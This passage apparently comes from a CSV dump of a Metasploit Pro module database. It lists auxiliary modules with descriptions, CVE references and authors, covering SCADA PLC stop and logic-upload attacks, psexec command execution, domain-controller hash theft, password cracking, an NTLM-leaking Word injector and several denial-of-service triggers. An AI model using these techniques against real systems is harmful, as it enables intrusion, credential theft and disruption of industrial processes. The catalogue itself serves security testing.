A valid username and password must be provided.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley" 1180,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/scada/igss_exec_17.rb","auxiliary","admin/scada/igss_exec_17","auxiliary/admin/scada/igss_exec_17","Interactive Graphical SCADA System Remote Command Injection",300,"This module abuses a directory traversal flaw in Interactive Graphical SCADA System v9.00. In conjunction with the traversal flaw, if opcode 0x17 is sent to the dc.exe process, an attacker may be able to execute arbitrary system commands.","Metasploit Framework License (BSD)","f","2011-03-21 00:00:00",,,"aggressive","t","CVE-2011-1566, OSVDB-72349, URL-http://aluigi.org/adv/igss_8-adv.txt","Luigi Auriemma, MC " 1181,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/scada/modicon_command.rb","auxiliary","admin/scada/modicon_command","auxiliary/admin/scada/modicon_command","Schneider Modicon Remote START/STOP Command",300,"The Schneider Modicon with Unity series of PLCs use Modbus function code 90 (0x5a) to perform administrative commands without authentication. This module allows a remote user to change the state of the PLC between STOP and RUN, allowing an attacker to end process control by the PLC. This module is based on the original 'modiconstop.rb' Basecamp module from DigitalBond.","Metasploit Framework License (BSD)","f","2012-04-05 00:00:00",,,"aggressive","t","URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/","K. 
Reid Wightman , todb " 1182,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/scada/modicon_password_recovery.rb","auxiliary","admin/scada/modicon_password_recovery","auxiliary/admin/scada/modicon_password_recovery","Schneider Modicon Quantum Password Recovery",300,"The Schneider Modicon Quantum series of Ethernet cards store usernames and passwords for the system in files that may be retrieved via backdoor access. This module is based on the original 'modiconpass.rb' Basecamp module from DigitalBond.","Metasploit Framework License (BSD)","f","2012-01-19 00:00:00",,,"aggressive","t","URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/","K. Reid Wightman , todb " 1183,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/scada/modicon_stux_transfer.rb","auxiliary","admin/scada/modicon_stux_transfer","auxiliary/admin/scada/modicon_stux_transfer","Schneider Modicon Ladder Logic Upload/Download",300,"The Schneider Modicon with Unity series of PLCs use Modbus function code 90 (0x5a) to send and receive ladder logic. The protocol is unauthenticated, and allows a rogue host to retrieve the existing logic and to upload new logic. Two modes are supported: ""SEND"" and ""RECV,"" which behave as one might expect -- use 'set mode ACTIONAME' to use either mode of operation. In either mode, FILENAME must be set to a valid path to an existing file (for SENDing) or a new file (for RECVing), and the directory must already exist. The default, 'modicon_ladder.apx' is a blank ladder logic file which can be used for testing. This module is based on the original 'modiconstux.rb' Basecamp module from DigitalBond.","Metasploit Framework License (BSD)","f","2012-04-05 00:00:00",,,"aggressive","t","URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/","K. 
Reid Wightman , todb " 1184,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/scada/multi_cip_command.rb","auxiliary","admin/scada/multi_cip_command","auxiliary/admin/scada/multi_cip_command","Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands",300,"The EtherNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which implements the protocol. This module implements the CPU STOP command, as well as the ability to crash the Ethernet card in an affected device. This module is based on the original 'ethernetip-multi.rb' Basecamp module from DigitalBond.","Metasploit Framework License (BSD)","f","2012-01-19 00:00:00",,,"aggressive","t","URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/","K. Reid Wightman , Ruben Santamarta , todb " 1185,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/serverprotect/file.rb","auxiliary","admin/serverprotect/file","auxiliary/admin/serverprotect/file","TrendMicro ServerProtect File Access",300,"This module exploits a remote file access flaw in the ServerProtect Windows Server RPC service. Please see the action list (or the help output) for more information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2007-6507, OSVDB-44318, URL-http://www.zerodayinitiative.com/advisories/ZDI-07-077.html","toto" 1186,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/smb/check_dir_file.rb","auxiliary","admin/smb/check_dir_file","auxiliary/admin/smb/check_dir_file","SMB Scanner Check File/Directory Utility",300,"This module is useful when checking an entire network of SMB hosts for the presence of a known file or directory. An example would be to scan all systems for the presence of antivirus software or of a known malware outbreak. 
Typically you must set RPATH, SMBUser, SMBDomain and SMBPass for it to operate correctly.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"patrick " 1187,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/smb/list_directory.rb","auxiliary","admin/smb/list_directory","auxiliary/admin/smb/list_directory","SMB Directory Listing Utility",300,"This module lists the directory of a target share and path. The only reason to use this module is if your existing SMB client is not able to support the features of the Metasploit Framework that you need, like pass-the-hash authentication.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , mubix " 1188,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/smb/psexec_command.rb","auxiliary","admin/smb/psexec_command","auxiliary/admin/smb/psexec_command","Microsoft Windows Authenticated Command Execution",300,"This module uses a valid administrator username and password to execute an arbitrary command on one or more hosts, using a technique similar to the ""psexec"" utility provided by SysInternals. Daisy-chaining commands with '&' does not work and users shouldn't try it. This module is useful because it doesn't need to upload any binaries to the target machine.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0504, OSVDB-3106, URL-http://sourceforge.net/projects/smbexec/, URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx, URL-http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access","Royce Davis @R3dy__ " 1189,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb","auxiliary","admin/smb/psexec_ntdsgrab","auxiliary/admin/smb/psexec_ntdsgrab","PsExec NTDS.dit And SYSTEM Hive Download Utility",300,"This module authenticates to an Active Directory Domain Controller and creates a volume shadow copy of the %SYSTEMDRIVE%. 
It then pulls down copies of the ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM hive copy can be used in combination with other tools for offline extraction of AD password hashes. All of this is done without uploading a single binary to the target host.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://sourceforge.net/projects/smbexec, URL-http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access","Royce Davis " 1190,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/smb/samba_symlink_traversal.rb","auxiliary","admin/smb/samba_symlink_traversal","auxiliary/admin/smb/samba_symlink_traversal","Samba Symlink Directory Traversal",300,"This module exploits a directory traversal flaw in the Samba CIFS server. To exploit this flaw, a writeable share must be specified. The newly created directory will link to the root filesystem.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-62145, URL-http://www.samba.org/samba/news/symlink_attack.html","hdm , kcope" 1191,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/smb/upload_file.rb","auxiliary","admin/smb/upload_file","auxiliary/admin/smb/upload_file","SMB File Upload Utility",300,"This module uploads a file to a target share and path. The only reason to use this module is if your existing SMB client is not able to support the features of the Metasploit Framework that you need, like pass-the-hash authentication.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1192,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb","auxiliary","admin/sunrpc/solaris_kcms_readfile","auxiliary/admin/sunrpc/solaris_kcms_readfile","Solaris KCMS + TTDB Arbitrary File Read",300,"This module targets a directory traversal vulnerability in the kcms_server component from the Kodak Color Management System. 
By utilizing the ToolTalk Database Server's TT_ISBUILD procedure, an attacker can bypass existing directory traversal validation and read arbitrary files. Vulnerable systems include Solaris 2.5 - 9 (SPARC and x86). Both kcms_server and rpc.ttdbserverd must be running on the target host.","Metasploit Framework License (BSD)","f","2003-01-22 00:00:00",,,"aggressive","t","BID-6665, CVE-2003-0027, OSVDB-8201, URL-http://marc.info/?l=bugtraq&m=104326556329850&w=2, URL-http://sunsolve.sun.com/search/document.do?assetkey=1-77-1000898.1-1","jduck , vlad902 " 1193,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/tftp/tftp_transfer_util.rb","auxiliary","admin/tftp/tftp_transfer_util","auxiliary/admin/tftp/tftp_transfer_util","TFTP File Transfer Utility",300,"This module will transfer a file to or from a remote TFTP server. Note that the target must be able to connect back to the Metasploit system, and NAT traversal for TFTP is often unsupported. Two actions are supported: ""Upload"" and ""Download,"" which behave as one might expect -- use 'set action Actionname' to use either mode of operation. If ""Download"" is selected, at least one of FILENAME or REMOTE_FILENAME must be set. If ""Upload"" is selected, either FILENAME must be set to a valid path to a source file, or FILEDATA must be populated. 
FILENAME may be a fully qualified path, or the name of a file in the Msf::Config.local_directory or Msf::Config.data_directory.","Metasploit Framework License (BSD)","f",,,"Upload","aggressive","t","URL-http://www.faqs.org/rfcs/rfc1350.html, URL-http://www.networksorcery.com/enp/protocol/tftp.htm","todb " 1194,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/tikiwiki/tikidblib.rb","auxiliary","admin/tikiwiki/tikidblib","auxiliary/admin/tikiwiki/tikidblib","TikiWiki Information Disclosure",300,"A vulnerability has been reported in Tikiwiki, which can be exploited by an anonymous user to dump the MySQL username and password just by triggering a MySQL error with the ""sort_mode"" variable. The vulnerability was reported in Tikiwiki version 1.9.5.","Metasploit Framework License (BSD)","f","2006-11-01 00:00:00",,"Download","aggressive","t","BID-20858, CVE-2006-5702, OSVDB-30172, URL-http://secunia.com/advisories/22678/","Matteo Cantoni " 1195,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vmware/poweroff_vm.rb","auxiliary","admin/vmware/poweroff_vm","auxiliary/admin/vmware/poweroff_vm","VMWare Power Off Virtual Machine",300,"This module will log into the Web API of VMWare and try to power off a specified Virtual Machine.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1196,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vmware/poweron_vm.rb","auxiliary","admin/vmware/poweron_vm","auxiliary/admin/vmware/poweron_vm","VMWare Power On Virtual Machine",300,"This module will log into the Web API of VMWare and try to power on a specified Virtual Machine.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1197,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vmware/tag_vm.rb","auxiliary","admin/vmware/tag_vm","auxiliary/admin/vmware/tag_vm","VMWare Tag Virtual Machine",300,"This module will log into the Web API of 
VMWare and 'tag' a specified Virtual Machine. It does this by logging a user event with user-supplied text.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1198,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb","auxiliary","admin/vmware/terminate_esx_sessions","auxiliary/admin/vmware/terminate_esx_sessions","VMWare Terminate ESX Login Sessions",300,"This module will log into the Web API of VMWare and try to terminate user login sessions as specified by the session keys.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1199,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb","auxiliary","admin/vnc/realvnc_41_bypass","auxiliary/admin/vnc/realvnc_41_bypass","RealVNC NULL Authentication Mode Bypass",300,"This module exploits an authentication bypass vulnerability in RealVNC Server versions 4.1.0 and 4.1.1. It sets up a proxy listener on LPORT and proxies to the target server. The AUTOVNC option requires that vncviewer be installed on the attacking machine.","Metasploit Framework License (BSD)","f","2006-05-15 00:00:00",,,"aggressive","t","BID-17978, CVE-2006-2369, OSVDB-25479, URL-http://secunia.com/advisories/20107/","hdm , theLightCosine " 1200,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb","auxiliary","admin/vxworks/apple_airport_extreme_password","auxiliary/admin/vxworks/apple_airport_extreme_password","Apple Airport Extreme Password Extraction (WDBRPC)",300,"This module can be used to read the stored password of a vulnerable Apple Airport Extreme access point. Only a small number of firmware versions have the WDBRPC service running; however, the factory configuration was vulnerable. It appears that firmware versions 5.0.x as well as 5.1.x are susceptible to this issue. 
Once the password is obtained, the access point can be managed using the Apple AirPort utility.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-66842, URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html, US-CERT-VU-362332","hdm " 1201,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb","auxiliary","admin/vxworks/dlink_i2eye_autoanswer","auxiliary/admin/vxworks/dlink_i2eye_autoanswer","D-Link i2eye Video Conference AutoAnswer (WDBRPC)",300,"This module can be used to enable auto-answer mode for the D-Link i2eye video conferencing system. Once this setting has been flipped, the device will accept incoming video calls without acknowledgement. The NetMeeting software included in Windows XP can be used to connect to this device. The i2eye product is no longer supported by the vendor and all models have reached their end of life (EOL).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-66842, URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html, US-CERT-VU-362332","hdm " 1202,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb","auxiliary","admin/vxworks/wdbrpc_memory_dump","auxiliary/admin/vxworks/wdbrpc_memory_dump","VxWorks WDB Agent Remote Memory Dump",300,"This module provides the ability to dump the system memory of a VxWorks target through WDBRPC","Metasploit Framework License (BSD)","f",,,"Download","aggressive","t","OSVDB-66842, URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html, US-CERT-VU-362332","hdm " 1203,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb","auxiliary","admin/vxworks/wdbrpc_reboot","auxiliary/admin/vxworks/wdbrpc_reboot","VxWorks WDB Agent Remote Reboot",300,"This module provides the ability to reboot a VxWorks target through WDBRPC","Metasploit Framework License 
(BSD)","f",,,"Reboot","aggressive","t","OSVDB-66842, URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html, US-CERT-VU-362332","hdm " 1204,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb","auxiliary","admin/webmin/edit_html_fileaccess","auxiliary/admin/webmin/edit_html_fileaccess","Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access",300,"This module exploits a directory traversal in Webmin 1.580. The vulnerability exists in the edit_html.cgi component and allows an authenticated user with access to the File Manager Module to access arbitrary files with root privileges. The module has been tested successfully with Webmin 1.580 on Ubuntu 10.04.","Metasploit Framework License (BSD)","f","2012-09-06 00:00:00",,"Download","aggressive","t","BID-55446, CVE-2012-2983, OSVDB-85247, URL-http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf, URL-https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80","Unknown, juan vazquez " 1205,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/webmin/file_disclosure.rb","auxiliary","admin/webmin/file_disclosure","auxiliary/admin/webmin/file_disclosure","Webmin File Disclosure",300,"A vulnerability has been reported in Webmin and Usermin, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused by an unspecified error in the handling of a URL. This can be exploited to read the contents of any files on the server via a specially crafted URL, without requiring a valid login. 
The vulnerability has been reported in Webmin (versions prior to 1.290) and Usermin (versions prior to 1.220).","Metasploit Framework License (BSD)","f","2006-06-30 00:00:00",,"Download","aggressive","t","BID-18744, CVE-2006-3392, OSVDB-26772, URL-http://secunia.com/advisories/20892/, US-CERT-VU-999601","Matteo Cantoni " 1206,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/zend/java_bridge.rb","auxiliary","admin/zend/java_bridge","auxiliary/admin/zend/java_bridge","Zend Server Java Bridge Design Flaw Remote Code Execution",300,"This module abuses a flaw in the Zend Java Bridge Component of the Zend Server Framework. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. NOTE: This module has only been tested with the Win32 build of the software.","Metasploit Framework License (BSD)","f","2011-03-28 00:00:00",,,"aggressive","t","EDB-17078, OSVDB-71420, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-113/","MC , ikki" 1207,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/jtr_aix.rb","auxiliary","analyze/jtr_aix","auxiliary/analyze/jtr_aix","John the Ripper AIX Password Cracker",300,"This module uses John the Ripper to identify weak passwords that have been acquired from passwd files on AIX systems.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , theLightCosine " 1208,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/jtr_crack_fast.rb","auxiliary","analyze/jtr_crack_fast","auxiliary/analyze/jtr_crack_fast","John the Ripper Password Cracker (Fast Mode)",300,"This module uses John the Ripper to identify weak passwords that have been acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal of this module is to find trivial passwords in a short amount of time. To crack complex passwords or use large wordlists, John the Ripper should be used outside of Metasploit. 
This initial version just handles LM/NTLM credentials from hashdump and uses the standard wordlist and rules.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1209,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/jtr_linux.rb","auxiliary","analyze/jtr_linux","auxiliary/analyze/jtr_linux","John the Ripper Linux Password Cracker",300,"This module uses John the Ripper to identify weak passwords that have been acquired from unshadowed passwd files from Unix systems. The module will only crack MD5 and DES implementations by default. Set Crypt to true to also try to crack Blowfish and SHA implementations. Warning: This is much slower.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , theLightCosine " 1210,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/jtr_mssql_fast.rb","auxiliary","analyze/jtr_mssql_fast","auxiliary/analyze/jtr_mssql_fast","John the Ripper MS SQL Password Cracker (Fast Mode)",300,"This module uses John the Ripper to identify weak passwords that have been acquired from the mssql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , theLightCosine " 1211,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/jtr_mysql_fast.rb","auxiliary","analyze/jtr_mysql_fast","auxiliary/analyze/jtr_mysql_fast","John the Ripper MySQL Password Cracker (Fast Mode)",300,"This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_hashdump module. 
Passwords that have been successfully cracked are then saved as proper credentials","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , theLightCosine " 1212,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/jtr_oracle_fast.rb","auxiliary","analyze/jtr_oracle_fast","auxiliary/analyze/jtr_oracle_fast","John the Ripper Oracle Password Cracker (Fast Mode)",300,"This module uses John the Ripper to identify weak passwords that have been acquired from the oracle_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , theLightCosine " 1213,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/jtr_unshadow.rb","auxiliary","analyze/jtr_unshadow","auxiliary/analyze/jtr_unshadow","Unix Unshadow Utility",300,"This module takes a passwd and shadow file and 'unshadows' them and saves them as linux.hashes loot.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1214,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/postgres_md5_crack.rb","auxiliary","analyze/postgres_md5_crack","auxiliary/analyze/postgres_md5_crack","Postgres SQL md5 Password Cracker",300,"This module attempts to crack Postgres SQL md5 password hashes. It creates hashes based on information saved in the MSF Database such as hostnames, usernames, passwords, and database schema information. 
The user can also supply an additional external wordlist if they wish.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1215,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/bnat/bnat_router.rb","auxiliary","bnat/bnat_router","auxiliary/bnat/bnat_router","BNAT Router",300,"This module will properly route BNAT traffic and allow for connections to be established to machines on ports which might not otherwise be accessible.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels, URL-https://github.com/claudijd/BNAT-Suite","Jonathan Claudius, bannedit " 1216,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/bnat/bnat_scan.rb","auxiliary","bnat/bnat_scan","auxiliary/bnat/bnat_scan","BNAT Scanner",300,"This module is a scanner which can detect Broken NAT (network address translation) implementations, which could result in an inability to reach ports on remote machines. Typically, these ports will appear in nmap scans as 'filtered'/'closed'.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels, URL-https://github.com/claudijd/BNAT-Suite","Jonathan Claudius , bannedit " 1217,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/client/smtp/emailer.rb","auxiliary","client/smtp/emailer","auxiliary/client/smtp/emailer","Generic Emailer (SMTP)",300,"This module can be used to automate email delivery. 
This code is based on Joshua Abraham's email script for social engineering.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://spl0it.org/","et " 1218,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/crawler/msfcrawler.rb","auxiliary","crawler/msfcrawler","auxiliary/crawler/msfcrawler","Metasploit Web Crawler",300,"This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et " 1219,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/docx/word_unc_injector.rb","auxiliary","docx/word_unc_injector","auxiliary/docx/word_unc_injector","Microsoft Word UNC Path Injector",300,"This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed, the receiver needs to put the document in editing mode before the remote server will be contacted; preview and read-only mode do not trigger the connection. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to capture the hashes, the auxiliary/server/capture/smb module can be used.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://jedicorp.com/?p=534","SphaZ " 1220,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb","auxiliary","dos/cisco/ios_http_percentpercent","auxiliary/dos/cisco/ios_http_percentpercent","Cisco IOS HTTP GET /%% request Denial of Service",300,"This module triggers a Denial of Service condition in the Cisco IOS HTTP server. By sending a GET request for ""/%%"", the device becomes unresponsive. IOS 11.1 through 12.1 are reportedly vulnerable. 
This module was tested successfully against a Cisco 1600 router running IOS v11.2(18)P.","Metasploit Framework License (BSD)","f","2000-04-26 00:00:00",,,"aggressive","t","BID-1154, CVE-2000-0380, OSVDB-1302, URL-http://www.cisco.com/warp/public/707/cisco-sa-20000514-ios-http-server.shtml","Patrick Webster " 1221,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb","auxiliary","dos/dhcp/isc_dhcpd_clientid","auxiliary/dos/dhcp/isc_dhcpd_clientid","ISC DHCP Zero Length ClientID Denial of Service Module",300,"This module performs a Denial of Service attack against the ISC DHCP server, versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request message with a 0-length client_id option for an IP address in the appropriate range for the DHCP server. When the ISC DHCP server tries to hash this value, it exits abnormally.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2010-2156, EDB-14185, OSVDB-65246","sid, theLightCosine " 1222,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb","auxiliary","dos/freebsd/nfsd/nfsd_mount","auxiliary/dos/freebsd/nfsd/nfsd_mount","FreeBSD Remote NFS RPC Request Denial of Service",300,"This module sends a specially crafted NFS Mount request causing a kernel panic on a host running FreeBSD 6.0.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-16838, CVE-2006-0900, OSVDB-23511, URL-http://lists.immunitysec.com/pipermail/dailydave/2006-February/002982.html","MC " 1223,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/hp/data_protector_rds.rb","auxiliary","dos/hp/data_protector_rds","auxiliary/dos/hp/data_protector_rds","HP Data Protector Manager RDS DOS",0,"This module causes a remote DOS on HP Data Protector's RDS service. 
By sending a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous size for malloc().","Metasploit Framework License (BSD)","f","2011-01-08 00:00:00",,,"aggressive","t","CVE-2011-0514, EDB-15940, OSVDB-70617","Roi Mallo , sinn3r " 1224,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/3com_superstack_switch.rb","auxiliary","dos/http/3com_superstack_switch","auxiliary/dos/http/3com_superstack_switch","3Com SuperStack Switch Denial of Service",300,"This module causes a temporary denial of service condition against 3Com SuperStack switches. By sending excessive data to the HTTP Management interface, the switch stops responding temporarily. The device does not reset. Tested successfully against a 3300SM firmware v2.66. Reported to affect versions prior to v2.72.","Metasploit Framework License (BSD)","f","2004-06-24 00:00:00",,,"aggressive","t","CVE-2004-2691, OSVDB-7246, URL-http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf","patrick " 1225,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/apache_mod_isapi.rb","auxiliary","dos/http/apache_mod_isapi","auxiliary/dos/http/apache_mod_isapi","Apache mod_isapi <= 2.2.14 Dangling Pointer",300,"This module triggers a use-after-free vulnerability in the Apache Software Foundation mod_isapi extension. In order to reach the vulnerable code, the target server must have an ISAPI module installed and configured. By making a request that terminates abnormally (either an aborted TCP connection or an unsatisfied chunked request), mod_isapi will unload the ISAPI extension. Later, if another request comes for that ISAPI module, previously obtained pointers will be used resulting in an access violation or potentially arbitrary code execution. Although arbitrary code execution is theoretically possible, a real-world method of invoking this consequence has not been proven. 
In order to do so, one would need to find a situation where a particular ISAPI module loads at an image base address that can be re-allocated by a remote attacker. Limited success was encountered using two separate ISAPI modules. In this scenario, a second ISAPI module was loaded into the same memory area as the previously unloaded module.","Metasploit Framework License (BSD)","f","2010-03-05 00:00:00",,,"aggressive","t","BID-38494, CVE-2010-0425, EDB-11650, OSVDB-62674, URL-http://www.gossamer-threads.com/lists/apache/cvs/381537, URL-http://www.senseofsecurity.com.au/advisories/SOS-10-002, URL-https://issues.apache.org/bugzilla/show_bug.cgi?id=48509","Brett Gervasoni, jduck " 1226,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/apache_range_dos.rb","auxiliary","dos/http/apache_range_dos","auxiliary/dos/http/apache_range_dos","Apache Range header DoS (Apache Killer)",300,"The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, exploit called ""Apache Killer""","Metasploit Framework License (BSD)","f","2011-08-19 00:00:00",,"DOS","aggressive","t","BID-49303, CVE-2011-3192, EDB-17696, OSVDB-74721","Kingcope, Markus Neis , Masashi Fujiwara" 1227,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb","auxiliary","dos/http/apache_tomcat_transfer_encoding","auxiliary/dos/http/apache_tomcat_transfer_encoding","Apache Tomcat Transfer-Encoding Information Disclosure and DoS",300,"Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with ""recycling of a buffer.""","Metasploit 
Framework License (BSD)","f","2010-07-09 00:00:00",,,"aggressive","t","BID-41544, CVE-2010-2227, OSVDB-66319","Hoagie , Paulino Calderon , Steve Jones" 1228,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/http/dell_openmanage_post.rb","auxiliary","dos/http/dell_openmanage_post","auxiliary/dos/http/dell_openmanage_post","Dell OpenManage POST Request Heap Overflow (win32)",300,"This module exploits a heap overflow in the Dell OpenManage Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability exists due to a boundary error within the handling of POST requests, where the application input is set to an overly long file name. This module will crash the web server, however it is likely exploitable under certain conditions.","Metasploit Framework License (BSD)","f","2004-02-26 00:00:00",,,"aggressive","t","BID-9750, CVE-2004-0331, OSVDB-4077, URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html","patrick " 1229,"2013-05-07 